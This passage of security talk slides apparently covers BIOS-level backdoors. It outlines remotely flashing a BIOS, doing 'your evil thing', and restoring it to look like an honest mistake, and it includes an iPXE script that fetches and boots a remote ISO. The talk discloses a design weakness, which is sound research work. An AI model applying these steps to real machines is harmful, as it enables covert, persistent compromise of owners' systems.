→ « honest mistake » if discovered.
- remotely flash the BIOS.
- do your evil thing.
- restore the BIOS remotely.
63. Booting an alternate OS from a
Storage Area Network (SAN)
This is possible over a fast enough link (gigabit
ethernet for instance)
64. Booting an alternate OS from a
Storage Area Network (SAN)
#!ipxe
# fecth iso from SAN and boot
sanboot http://boot.ipxe.org/freedos/fdfullcd.iso
65. The fake problem of BIOS Graphics
- CoreBoot supports adding a bootsplash if you
know in advance what BIOS is targetted.
- SeaBIOS has a very minimal menu (wiped out in
Rakshasa). Other payloads can have better
menus.
Actually...
69. Outro
This is not a vulnerability :
- it is sheer bad design due to legacy.
- don't expect a patch.
- fixing those issues will probably require breaking
backward compatibility with most standards
(PCI, PCIe, TPM).